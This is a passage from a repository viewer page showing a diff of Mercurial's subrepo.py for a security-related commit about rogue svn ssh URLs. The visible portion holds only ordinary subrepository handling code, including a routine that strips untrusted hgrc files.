##// END OF EJS Templates
subrepo: add tests for svn rogue ssh urls (SEC)...
Sean Farley -
r33713:173ecccb stable
parent child Browse files
Show More
@@ -1,1987 +1,1991 b''
1 # subrepo.py - sub-repository handling for Mercurial
1 # subrepo.py - sub-repository handling for Mercurial
2 #
2 #
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import copy
10 import copy
11 import errno
11 import errno
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import posixpath
14 import posixpath
15 import re
15 import re
16 import stat
16 import stat
17 import subprocess
17 import subprocess
18 import sys
18 import sys
19 import tarfile
19 import tarfile
20 import xml.dom.minidom
20 import xml.dom.minidom
21
21
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 cmdutil,
25 cmdutil,
26 config,
26 config,
27 encoding,
27 encoding,
28 error,
28 error,
29 exchange,
29 exchange,
30 filemerge,
30 filemerge,
31 match as matchmod,
31 match as matchmod,
32 node,
32 node,
33 pathutil,
33 pathutil,
34 phases,
34 phases,
35 pycompat,
35 pycompat,
36 scmutil,
36 scmutil,
37 util,
37 util,
38 vfs as vfsmod,
38 vfs as vfsmod,
39 )
39 )
40
40
41 hg = None
41 hg = None
42 propertycache = util.propertycache
42 propertycache = util.propertycache
43
43
44 nullstate = ('', '', 'empty')
44 nullstate = ('', '', 'empty')
45
45
46 def _expandedabspath(path):
46 def _expandedabspath(path):
47 '''
47 '''
48 get a path or url and if it is a path expand it and return an absolute path
48 get a path or url and if it is a path expand it and return an absolute path
49 '''
49 '''
50 expandedpath = util.urllocalpath(util.expandpath(path))
50 expandedpath = util.urllocalpath(util.expandpath(path))
51 u = util.url(expandedpath)
51 u = util.url(expandedpath)
52 if not u.scheme:
52 if not u.scheme:
53 path = util.normpath(os.path.abspath(u.path))
53 path = util.normpath(os.path.abspath(u.path))
54 return path
54 return path
55
55
56 def _getstorehashcachename(remotepath):
56 def _getstorehashcachename(remotepath):
57 '''get a unique filename for the store hash cache of a remote repository'''
57 '''get a unique filename for the store hash cache of a remote repository'''
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
58 return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
59
59
60 class SubrepoAbort(error.Abort):
60 class SubrepoAbort(error.Abort):
61 """Exception class used to avoid handling a subrepo error more than once"""
61 """Exception class used to avoid handling a subrepo error more than once"""
62 def __init__(self, *args, **kw):
62 def __init__(self, *args, **kw):
63 self.subrepo = kw.pop('subrepo', None)
63 self.subrepo = kw.pop('subrepo', None)
64 self.cause = kw.pop('cause', None)
64 self.cause = kw.pop('cause', None)
65 error.Abort.__init__(self, *args, **kw)
65 error.Abort.__init__(self, *args, **kw)
66
66
67 def annotatesubrepoerror(func):
67 def annotatesubrepoerror(func):
68 def decoratedmethod(self, *args, **kargs):
68 def decoratedmethod(self, *args, **kargs):
69 try:
69 try:
70 res = func(self, *args, **kargs)
70 res = func(self, *args, **kargs)
71 except SubrepoAbort as ex:
71 except SubrepoAbort as ex:
72 # This exception has already been handled
72 # This exception has already been handled
73 raise ex
73 raise ex
74 except error.Abort as ex:
74 except error.Abort as ex:
75 subrepo = subrelpath(self)
75 subrepo = subrelpath(self)
76 errormsg = str(ex) + ' ' + _('(in subrepo %s)') % subrepo
76 errormsg = str(ex) + ' ' + _('(in subrepo %s)') % subrepo
77 # avoid handling this exception by raising a SubrepoAbort exception
77 # avoid handling this exception by raising a SubrepoAbort exception
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
78 raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
79 cause=sys.exc_info())
79 cause=sys.exc_info())
80 return res
80 return res
81 return decoratedmethod
81 return decoratedmethod
82
82
83 def state(ctx, ui):
83 def state(ctx, ui):
84 """return a state dict, mapping subrepo paths configured in .hgsub
84 """return a state dict, mapping subrepo paths configured in .hgsub
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
85 to tuple: (source from .hgsub, revision from .hgsubstate, kind
86 (key in types dict))
86 (key in types dict))
87 """
87 """
88 p = config.config()
88 p = config.config()
89 repo = ctx.repo()
89 repo = ctx.repo()
90 def read(f, sections=None, remap=None):
90 def read(f, sections=None, remap=None):
91 if f in ctx:
91 if f in ctx:
92 try:
92 try:
93 data = ctx[f].data()
93 data = ctx[f].data()
94 except IOError as err:
94 except IOError as err:
95 if err.errno != errno.ENOENT:
95 if err.errno != errno.ENOENT:
96 raise
96 raise
97 # handle missing subrepo spec files as removed
97 # handle missing subrepo spec files as removed
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
98 ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
99 repo.pathto(f))
99 repo.pathto(f))
100 return
100 return
101 p.parse(f, data, sections, remap, read)
101 p.parse(f, data, sections, remap, read)
102 else:
102 else:
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
103 raise error.Abort(_("subrepo spec file \'%s\' not found") %
104 repo.pathto(f))
104 repo.pathto(f))
105 if '.hgsub' in ctx:
105 if '.hgsub' in ctx:
106 read('.hgsub')
106 read('.hgsub')
107
107
108 for path, src in ui.configitems('subpaths'):
108 for path, src in ui.configitems('subpaths'):
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
109 p.set('subpaths', path, src, ui.configsource('subpaths', path))
110
110
111 rev = {}
111 rev = {}
112 if '.hgsubstate' in ctx:
112 if '.hgsubstate' in ctx:
113 try:
113 try:
114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
114 for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
115 l = l.lstrip()
115 l = l.lstrip()
116 if not l:
116 if not l:
117 continue
117 continue
118 try:
118 try:
119 revision, path = l.split(" ", 1)
119 revision, path = l.split(" ", 1)
120 except ValueError:
120 except ValueError:
121 raise error.Abort(_("invalid subrepository revision "
121 raise error.Abort(_("invalid subrepository revision "
122 "specifier in \'%s\' line %d")
122 "specifier in \'%s\' line %d")
123 % (repo.pathto('.hgsubstate'), (i + 1)))
123 % (repo.pathto('.hgsubstate'), (i + 1)))
124 rev[path] = revision
124 rev[path] = revision
125 except IOError as err:
125 except IOError as err:
126 if err.errno != errno.ENOENT:
126 if err.errno != errno.ENOENT:
127 raise
127 raise
128
128
129 def remap(src):
129 def remap(src):
130 for pattern, repl in p.items('subpaths'):
130 for pattern, repl in p.items('subpaths'):
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
131 # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
132 # does a string decode.
132 # does a string decode.
133 repl = util.escapestr(repl)
133 repl = util.escapestr(repl)
134 # However, we still want to allow back references to go
134 # However, we still want to allow back references to go
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
135 # through unharmed, so we turn r'\\1' into r'\1'. Again,
136 # extra escapes are needed because re.sub string decodes.
136 # extra escapes are needed because re.sub string decodes.
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
137 repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
138 try:
138 try:
139 src = re.sub(pattern, repl, src, 1)
139 src = re.sub(pattern, repl, src, 1)
140 except re.error as e:
140 except re.error as e:
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
141 raise error.Abort(_("bad subrepository pattern in %s: %s")
142 % (p.source('subpaths', pattern), e))
142 % (p.source('subpaths', pattern), e))
143 return src
143 return src
144
144
145 state = {}
145 state = {}
146 for path, src in p[''].items():
146 for path, src in p[''].items():
147 kind = 'hg'
147 kind = 'hg'
148 if src.startswith('['):
148 if src.startswith('['):
149 if ']' not in src:
149 if ']' not in src:
150 raise error.Abort(_('missing ] in subrepo source'))
150 raise error.Abort(_('missing ] in subrepo source'))
151 kind, src = src.split(']', 1)
151 kind, src = src.split(']', 1)
152 kind = kind[1:]
152 kind = kind[1:]
153 src = src.lstrip() # strip any extra whitespace after ']'
153 src = src.lstrip() # strip any extra whitespace after ']'
154
154
155 if not util.url(src).isabs():
155 if not util.url(src).isabs():
156 parent = _abssource(repo, abort=False)
156 parent = _abssource(repo, abort=False)
157 if parent:
157 if parent:
158 parent = util.url(parent)
158 parent = util.url(parent)
159 parent.path = posixpath.join(parent.path or '', src)
159 parent.path = posixpath.join(parent.path or '', src)
160 parent.path = posixpath.normpath(parent.path)
160 parent.path = posixpath.normpath(parent.path)
161 joined = str(parent)
161 joined = str(parent)
162 # Remap the full joined path and use it if it changes,
162 # Remap the full joined path and use it if it changes,
163 # else remap the original source.
163 # else remap the original source.
164 remapped = remap(joined)
164 remapped = remap(joined)
165 if remapped == joined:
165 if remapped == joined:
166 src = remap(src)
166 src = remap(src)
167 else:
167 else:
168 src = remapped
168 src = remapped
169
169
170 src = remap(src)
170 src = remap(src)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
171 state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)
172
172
173 return state
173 return state
174
174
175 def writestate(repo, state):
175 def writestate(repo, state):
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
176 """rewrite .hgsubstate in (outer) repo with these subrepo states"""
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
177 lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
178 if state[s][1] != nullstate[1]]
178 if state[s][1] != nullstate[1]]
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
179 repo.wwrite('.hgsubstate', ''.join(lines), '')
180
180
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
181 def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
182 """delegated from merge.applyupdates: merging of .hgsubstate file
182 """delegated from merge.applyupdates: merging of .hgsubstate file
183 in working context, merging context and ancestor context"""
183 in working context, merging context and ancestor context"""
184 if mctx == actx: # backwards?
184 if mctx == actx: # backwards?
185 actx = wctx.p1()
185 actx = wctx.p1()
186 s1 = wctx.substate
186 s1 = wctx.substate
187 s2 = mctx.substate
187 s2 = mctx.substate
188 sa = actx.substate
188 sa = actx.substate
189 sm = {}
189 sm = {}
190
190
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
191 repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))
192
192
193 def debug(s, msg, r=""):
193 def debug(s, msg, r=""):
194 if r:
194 if r:
195 r = "%s:%s:%s" % r
195 r = "%s:%s:%s" % r
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
196 repo.ui.debug(" subrepo %s: %s %s\n" % (s, msg, r))
197
197
198 promptssrc = filemerge.partextras(labels)
198 promptssrc = filemerge.partextras(labels)
199 for s, l in sorted(s1.iteritems()):
199 for s, l in sorted(s1.iteritems()):
200 prompts = None
200 prompts = None
201 a = sa.get(s, nullstate)
201 a = sa.get(s, nullstate)
202 ld = l # local state with possible dirty flag for compares
202 ld = l # local state with possible dirty flag for compares
203 if wctx.sub(s).dirty():
203 if wctx.sub(s).dirty():
204 ld = (l[0], l[1] + "+")
204 ld = (l[0], l[1] + "+")
205 if wctx == actx: # overwrite
205 if wctx == actx: # overwrite
206 a = ld
206 a = ld
207
207
208 prompts = promptssrc.copy()
208 prompts = promptssrc.copy()
209 prompts['s'] = s
209 prompts['s'] = s
210 if s in s2:
210 if s in s2:
211 r = s2[s]
211 r = s2[s]
212 if ld == r or r == a: # no change or local is newer
212 if ld == r or r == a: # no change or local is newer
213 sm[s] = l
213 sm[s] = l
214 continue
214 continue
215 elif ld == a: # other side changed
215 elif ld == a: # other side changed
216 debug(s, "other changed, get", r)
216 debug(s, "other changed, get", r)
217 wctx.sub(s).get(r, overwrite)
217 wctx.sub(s).get(r, overwrite)
218 sm[s] = r
218 sm[s] = r
219 elif ld[0] != r[0]: # sources differ
219 elif ld[0] != r[0]: # sources differ
220 prompts['lo'] = l[0]
220 prompts['lo'] = l[0]
221 prompts['ro'] = r[0]
221 prompts['ro'] = r[0]
222 if repo.ui.promptchoice(
222 if repo.ui.promptchoice(
223 _(' subrepository sources for %(s)s differ\n'
223 _(' subrepository sources for %(s)s differ\n'
224 'use (l)ocal%(l)s source (%(lo)s)'
224 'use (l)ocal%(l)s source (%(lo)s)'
225 ' or (r)emote%(o)s source (%(ro)s)?'
225 ' or (r)emote%(o)s source (%(ro)s)?'
226 '$$ &Local $$ &Remote') % prompts, 0):
226 '$$ &Local $$ &Remote') % prompts, 0):
227 debug(s, "prompt changed, get", r)
227 debug(s, "prompt changed, get", r)
228 wctx.sub(s).get(r, overwrite)
228 wctx.sub(s).get(r, overwrite)
229 sm[s] = r
229 sm[s] = r
230 elif ld[1] == a[1]: # local side is unchanged
230 elif ld[1] == a[1]: # local side is unchanged
231 debug(s, "other side changed, get", r)
231 debug(s, "other side changed, get", r)
232 wctx.sub(s).get(r, overwrite)
232 wctx.sub(s).get(r, overwrite)
233 sm[s] = r
233 sm[s] = r
234 else:
234 else:
235 debug(s, "both sides changed")
235 debug(s, "both sides changed")
236 srepo = wctx.sub(s)
236 srepo = wctx.sub(s)
237 prompts['sl'] = srepo.shortid(l[1])
237 prompts['sl'] = srepo.shortid(l[1])
238 prompts['sr'] = srepo.shortid(r[1])
238 prompts['sr'] = srepo.shortid(r[1])
239 option = repo.ui.promptchoice(
239 option = repo.ui.promptchoice(
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
240 _(' subrepository %(s)s diverged (local revision: %(sl)s, '
241 'remote revision: %(sr)s)\n'
241 'remote revision: %(sr)s)\n'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
242 '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
243 '$$ &Merge $$ &Local $$ &Remote')
243 '$$ &Merge $$ &Local $$ &Remote')
244 % prompts, 0)
244 % prompts, 0)
245 if option == 0:
245 if option == 0:
246 wctx.sub(s).merge(r)
246 wctx.sub(s).merge(r)
247 sm[s] = l
247 sm[s] = l
248 debug(s, "merge with", r)
248 debug(s, "merge with", r)
249 elif option == 1:
249 elif option == 1:
250 sm[s] = l
250 sm[s] = l
251 debug(s, "keep local subrepo revision", l)
251 debug(s, "keep local subrepo revision", l)
252 else:
252 else:
253 wctx.sub(s).get(r, overwrite)
253 wctx.sub(s).get(r, overwrite)
254 sm[s] = r
254 sm[s] = r
255 debug(s, "get remote subrepo revision", r)
255 debug(s, "get remote subrepo revision", r)
256 elif ld == a: # remote removed, local unchanged
256 elif ld == a: # remote removed, local unchanged
257 debug(s, "remote removed, remove")
257 debug(s, "remote removed, remove")
258 wctx.sub(s).remove()
258 wctx.sub(s).remove()
259 elif a == nullstate: # not present in remote or ancestor
259 elif a == nullstate: # not present in remote or ancestor
260 debug(s, "local added, keep")
260 debug(s, "local added, keep")
261 sm[s] = l
261 sm[s] = l
262 continue
262 continue
263 else:
263 else:
264 if repo.ui.promptchoice(
264 if repo.ui.promptchoice(
265 _(' local%(l)s changed subrepository %(s)s'
265 _(' local%(l)s changed subrepository %(s)s'
266 ' which remote%(o)s removed\n'
266 ' which remote%(o)s removed\n'
267 'use (c)hanged version or (d)elete?'
267 'use (c)hanged version or (d)elete?'
268 '$$ &Changed $$ &Delete') % prompts, 0):
268 '$$ &Changed $$ &Delete') % prompts, 0):
269 debug(s, "prompt remove")
269 debug(s, "prompt remove")
270 wctx.sub(s).remove()
270 wctx.sub(s).remove()
271
271
272 for s, r in sorted(s2.items()):
272 for s, r in sorted(s2.items()):
273 prompts = None
273 prompts = None
274 if s in s1:
274 if s in s1:
275 continue
275 continue
276 elif s not in sa:
276 elif s not in sa:
277 debug(s, "remote added, get", r)
277 debug(s, "remote added, get", r)
278 mctx.sub(s).get(r)
278 mctx.sub(s).get(r)
279 sm[s] = r
279 sm[s] = r
280 elif r != sa[s]:
280 elif r != sa[s]:
281 prompts = promptssrc.copy()
281 prompts = promptssrc.copy()
282 prompts['s'] = s
282 prompts['s'] = s
283 if repo.ui.promptchoice(
283 if repo.ui.promptchoice(
284 _(' remote%(o)s changed subrepository %(s)s'
284 _(' remote%(o)s changed subrepository %(s)s'
285 ' which local%(l)s removed\n'
285 ' which local%(l)s removed\n'
286 'use (c)hanged version or (d)elete?'
286 'use (c)hanged version or (d)elete?'
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
287 '$$ &Changed $$ &Delete') % prompts, 0) == 0:
288 debug(s, "prompt recreate", r)
288 debug(s, "prompt recreate", r)
289 mctx.sub(s).get(r)
289 mctx.sub(s).get(r)
290 sm[s] = r
290 sm[s] = r
291
291
292 # record merged .hgsubstate
292 # record merged .hgsubstate
293 writestate(repo, sm)
293 writestate(repo, sm)
294 return sm
294 return sm
295
295
296 def _updateprompt(ui, sub, dirty, local, remote):
296 def _updateprompt(ui, sub, dirty, local, remote):
297 if dirty:
297 if dirty:
298 msg = (_(' subrepository sources for %s differ\n'
298 msg = (_(' subrepository sources for %s differ\n'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
299 'use (l)ocal source (%s) or (r)emote source (%s)?'
300 '$$ &Local $$ &Remote')
300 '$$ &Local $$ &Remote')
301 % (subrelpath(sub), local, remote))
301 % (subrelpath(sub), local, remote))
302 else:
302 else:
303 msg = (_(' subrepository sources for %s differ (in checked out '
303 msg = (_(' subrepository sources for %s differ (in checked out '
304 'version)\n'
304 'version)\n'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
305 'use (l)ocal source (%s) or (r)emote source (%s)?'
306 '$$ &Local $$ &Remote')
306 '$$ &Local $$ &Remote')
307 % (subrelpath(sub), local, remote))
307 % (subrelpath(sub), local, remote))
308 return ui.promptchoice(msg, 0)
308 return ui.promptchoice(msg, 0)
309
309
310 def reporelpath(repo):
310 def reporelpath(repo):
311 """return path to this (sub)repo as seen from outermost repo"""
311 """return path to this (sub)repo as seen from outermost repo"""
312 parent = repo
312 parent = repo
313 while util.safehasattr(parent, '_subparent'):
313 while util.safehasattr(parent, '_subparent'):
314 parent = parent._subparent
314 parent = parent._subparent
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
315 return repo.root[len(pathutil.normasprefix(parent.root)):]
316
316
317 def subrelpath(sub):
317 def subrelpath(sub):
318 """return path to this subrepo as seen from outermost repo"""
318 """return path to this subrepo as seen from outermost repo"""
319 return sub._relpath
319 return sub._relpath
320
320
321 def _abssource(repo, push=False, abort=True):
321 def _abssource(repo, push=False, abort=True):
322 """return pull/push path of repo - either based on parent repo .hgsub info
322 """return pull/push path of repo - either based on parent repo .hgsub info
323 or on the top repo config. Abort or return None if no source found."""
323 or on the top repo config. Abort or return None if no source found."""
324 if util.safehasattr(repo, '_subparent'):
324 if util.safehasattr(repo, '_subparent'):
325 source = util.url(repo._subsource)
325 source = util.url(repo._subsource)
326 if source.isabs():
326 if source.isabs():
327 return str(source)
327 return str(source)
328 source.path = posixpath.normpath(source.path)
328 source.path = posixpath.normpath(source.path)
329 parent = _abssource(repo._subparent, push, abort=False)
329 parent = _abssource(repo._subparent, push, abort=False)
330 if parent:
330 if parent:
331 parent = util.url(util.pconvert(parent))
331 parent = util.url(util.pconvert(parent))
332 parent.path = posixpath.join(parent.path or '', source.path)
332 parent.path = posixpath.join(parent.path or '', source.path)
333 parent.path = posixpath.normpath(parent.path)
333 parent.path = posixpath.normpath(parent.path)
334 return str(parent)
334 return str(parent)
335 else: # recursion reached top repo
335 else: # recursion reached top repo
336 if util.safehasattr(repo, '_subtoppath'):
336 if util.safehasattr(repo, '_subtoppath'):
337 return repo._subtoppath
337 return repo._subtoppath
338 if push and repo.ui.config('paths', 'default-push'):
338 if push and repo.ui.config('paths', 'default-push'):
339 return repo.ui.config('paths', 'default-push')
339 return repo.ui.config('paths', 'default-push')
340 if repo.ui.config('paths', 'default'):
340 if repo.ui.config('paths', 'default'):
341 return repo.ui.config('paths', 'default')
341 return repo.ui.config('paths', 'default')
342 if repo.shared():
342 if repo.shared():
343 # chop off the .hg component to get the default path form
343 # chop off the .hg component to get the default path form
344 return os.path.dirname(repo.sharedpath)
344 return os.path.dirname(repo.sharedpath)
345 if abort:
345 if abort:
346 raise error.Abort(_("default path for subrepository not found"))
346 raise error.Abort(_("default path for subrepository not found"))
347
347
348 def _sanitize(ui, vfs, ignore):
348 def _sanitize(ui, vfs, ignore):
349 for dirname, dirs, names in vfs.walk():
349 for dirname, dirs, names in vfs.walk():
350 for i, d in enumerate(dirs):
350 for i, d in enumerate(dirs):
351 if d.lower() == ignore:
351 if d.lower() == ignore:
352 del dirs[i]
352 del dirs[i]
353 break
353 break
354 if vfs.basename(dirname).lower() != '.hg':
354 if vfs.basename(dirname).lower() != '.hg':
355 continue
355 continue
356 for f in names:
356 for f in names:
357 if f.lower() == 'hgrc':
357 if f.lower() == 'hgrc':
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
358 ui.warn(_("warning: removing potentially hostile 'hgrc' "
359 "in '%s'\n") % vfs.join(dirname))
359 "in '%s'\n") % vfs.join(dirname))
360 vfs.unlink(vfs.reljoin(dirname, f))
360 vfs.unlink(vfs.reljoin(dirname, f))
361
361
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
362 def subrepo(ctx, path, allowwdir=False, allowcreate=True):
363 """return instance of the right subrepo class for subrepo in path"""
363 """return instance of the right subrepo class for subrepo in path"""
364 # subrepo inherently violates our import layering rules
364 # subrepo inherently violates our import layering rules
365 # because it wants to make repo objects from deep inside the stack
365 # because it wants to make repo objects from deep inside the stack
366 # so we manually delay the circular imports to not break
366 # so we manually delay the circular imports to not break
367 # scripts that don't use our demand-loading
367 # scripts that don't use our demand-loading
368 global hg
368 global hg
369 from . import hg as h
369 from . import hg as h
370 hg = h
370 hg = h
371
371
372 pathutil.pathauditor(ctx.repo().root)(path)
372 pathutil.pathauditor(ctx.repo().root)(path)
373 state = ctx.substate[path]
373 state = ctx.substate[path]
374 if state[2] not in types:
374 if state[2] not in types:
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
375 raise error.Abort(_('unknown subrepo type %s') % state[2])
376 if allowwdir:
376 if allowwdir:
377 state = (state[0], ctx.subrev(path), state[2])
377 state = (state[0], ctx.subrev(path), state[2])
378 return types[state[2]](ctx, path, state[:2], allowcreate)
378 return types[state[2]](ctx, path, state[:2], allowcreate)
379
379
380 def nullsubrepo(ctx, path, pctx):
380 def nullsubrepo(ctx, path, pctx):
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
381 """return an empty subrepo in pctx for the extant subrepo in ctx"""
382 # subrepo inherently violates our import layering rules
382 # subrepo inherently violates our import layering rules
383 # because it wants to make repo objects from deep inside the stack
383 # because it wants to make repo objects from deep inside the stack
384 # so we manually delay the circular imports to not break
384 # so we manually delay the circular imports to not break
385 # scripts that don't use our demand-loading
385 # scripts that don't use our demand-loading
386 global hg
386 global hg
387 from . import hg as h
387 from . import hg as h
388 hg = h
388 hg = h
389
389
390 pathutil.pathauditor(ctx.repo().root)(path)
390 pathutil.pathauditor(ctx.repo().root)(path)
391 state = ctx.substate[path]
391 state = ctx.substate[path]
392 if state[2] not in types:
392 if state[2] not in types:
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
393 raise error.Abort(_('unknown subrepo type %s') % state[2])
394 subrev = ''
394 subrev = ''
395 if state[2] == 'hg':
395 if state[2] == 'hg':
396 subrev = "0" * 40
396 subrev = "0" * 40
397 return types[state[2]](pctx, path, (state[0], subrev), True)
397 return types[state[2]](pctx, path, (state[0], subrev), True)
398
398
399 def newcommitphase(ui, ctx):
399 def newcommitphase(ui, ctx):
400 commitphase = phases.newcommitphase(ui)
400 commitphase = phases.newcommitphase(ui)
401 substate = getattr(ctx, "substate", None)
401 substate = getattr(ctx, "substate", None)
402 if not substate:
402 if not substate:
403 return commitphase
403 return commitphase
404 check = ui.config('phases', 'checksubrepos', 'follow')
404 check = ui.config('phases', 'checksubrepos', 'follow')
405 if check not in ('ignore', 'follow', 'abort'):
405 if check not in ('ignore', 'follow', 'abort'):
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
406 raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
407 % (check))
407 % (check))
408 if check == 'ignore':
408 if check == 'ignore':
409 return commitphase
409 return commitphase
410 maxphase = phases.public
410 maxphase = phases.public
411 maxsub = None
411 maxsub = None
412 for s in sorted(substate):
412 for s in sorted(substate):
413 sub = ctx.sub(s)
413 sub = ctx.sub(s)
414 subphase = sub.phase(substate[s][1])
414 subphase = sub.phase(substate[s][1])
415 if maxphase < subphase:
415 if maxphase < subphase:
416 maxphase = subphase
416 maxphase = subphase
417 maxsub = s
417 maxsub = s
418 if commitphase < maxphase:
418 if commitphase < maxphase:
419 if check == 'abort':
419 if check == 'abort':
420 raise error.Abort(_("can't commit in %s phase"
420 raise error.Abort(_("can't commit in %s phase"
421 " conflicting %s from subrepository %s") %
421 " conflicting %s from subrepository %s") %
422 (phases.phasenames[commitphase],
422 (phases.phasenames[commitphase],
423 phases.phasenames[maxphase], maxsub))
423 phases.phasenames[maxphase], maxsub))
424 ui.warn(_("warning: changes are committed in"
424 ui.warn(_("warning: changes are committed in"
425 " %s phase from subrepository %s\n") %
425 " %s phase from subrepository %s\n") %
426 (phases.phasenames[maxphase], maxsub))
426 (phases.phasenames[maxphase], maxsub))
427 return maxphase
427 return maxphase
428 return commitphase
428 return commitphase
429
429
430 # subrepo classes need to implement the following abstract class:
430 # subrepo classes need to implement the following abstract class:
431
431
432 class abstractsubrepo(object):
432 class abstractsubrepo(object):
433
433
434 def __init__(self, ctx, path):
434 def __init__(self, ctx, path):
435 """Initialize abstractsubrepo part
435 """Initialize abstractsubrepo part
436
436
437 ``ctx`` is the context referring this subrepository in the
437 ``ctx`` is the context referring this subrepository in the
438 parent repository.
438 parent repository.
439
439
440 ``path`` is the path to this subrepository as seen from
440 ``path`` is the path to this subrepository as seen from
441 innermost repository.
441 innermost repository.
442 """
442 """
443 self.ui = ctx.repo().ui
443 self.ui = ctx.repo().ui
444 self._ctx = ctx
444 self._ctx = ctx
445 self._path = path
445 self._path = path
446
446
447 def addwebdirpath(self, serverpath, webconf):
447 def addwebdirpath(self, serverpath, webconf):
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
449
449
450 ``serverpath`` is the path component of the URL for this repo.
450 ``serverpath`` is the path component of the URL for this repo.
451
451
452 ``webconf`` is the dictionary of hgwebdir entries.
452 ``webconf`` is the dictionary of hgwebdir entries.
453 """
453 """
454 pass
454 pass
455
455
456 def storeclean(self, path):
456 def storeclean(self, path):
457 """
457 """
458 returns true if the repository has not changed since it was last
458 returns true if the repository has not changed since it was last
459 cloned from or pushed to a given repository.
459 cloned from or pushed to a given repository.
460 """
460 """
461 return False
461 return False
462
462
463 def dirty(self, ignoreupdate=False):
463 def dirty(self, ignoreupdate=False):
464 """returns true if the dirstate of the subrepo is dirty or does not
464 """returns true if the dirstate of the subrepo is dirty or does not
465 match current stored state. If ignoreupdate is true, only check
465 match current stored state. If ignoreupdate is true, only check
466 whether the subrepo has uncommitted changes in its dirstate.
466 whether the subrepo has uncommitted changes in its dirstate.
467 """
467 """
468 raise NotImplementedError
468 raise NotImplementedError
469
469
470 def dirtyreason(self, ignoreupdate=False):
470 def dirtyreason(self, ignoreupdate=False):
471 """return reason string if it is ``dirty()``
471 """return reason string if it is ``dirty()``
472
472
473 Returned string should have enough information for the message
473 Returned string should have enough information for the message
474 of exception.
474 of exception.
475
475
476 This returns None, otherwise.
476 This returns None, otherwise.
477 """
477 """
478 if self.dirty(ignoreupdate=ignoreupdate):
478 if self.dirty(ignoreupdate=ignoreupdate):
479 return _("uncommitted changes in subrepository '%s'"
479 return _("uncommitted changes in subrepository '%s'"
480 ) % subrelpath(self)
480 ) % subrelpath(self)
481
481
482 def bailifchanged(self, ignoreupdate=False, hint=None):
482 def bailifchanged(self, ignoreupdate=False, hint=None):
483 """raise Abort if subrepository is ``dirty()``
483 """raise Abort if subrepository is ``dirty()``
484 """
484 """
485 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate)
485 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate)
486 if dirtyreason:
486 if dirtyreason:
487 raise error.Abort(dirtyreason, hint=hint)
487 raise error.Abort(dirtyreason, hint=hint)
488
488
489 def basestate(self):
489 def basestate(self):
490 """current working directory base state, disregarding .hgsubstate
490 """current working directory base state, disregarding .hgsubstate
491 state and working directory modifications"""
491 state and working directory modifications"""
492 raise NotImplementedError
492 raise NotImplementedError
493
493
494 def checknested(self, path):
494 def checknested(self, path):
495 """check if path is a subrepository within this repository"""
495 """check if path is a subrepository within this repository"""
496 return False
496 return False
497
497
498 def commit(self, text, user, date):
498 def commit(self, text, user, date):
499 """commit the current changes to the subrepo with the given
499 """commit the current changes to the subrepo with the given
500 log message. Use given user and date if possible. Return the
500 log message. Use given user and date if possible. Return the
501 new state of the subrepo.
501 new state of the subrepo.
502 """
502 """
503 raise NotImplementedError
503 raise NotImplementedError
504
504
505 def phase(self, state):
505 def phase(self, state):
506 """returns phase of specified state in the subrepository.
506 """returns phase of specified state in the subrepository.
507 """
507 """
508 return phases.public
508 return phases.public
509
509
510 def remove(self):
510 def remove(self):
511 """remove the subrepo
511 """remove the subrepo
512
512
513 (should verify the dirstate is not dirty first)
513 (should verify the dirstate is not dirty first)
514 """
514 """
515 raise NotImplementedError
515 raise NotImplementedError
516
516
517 def get(self, state, overwrite=False):
517 def get(self, state, overwrite=False):
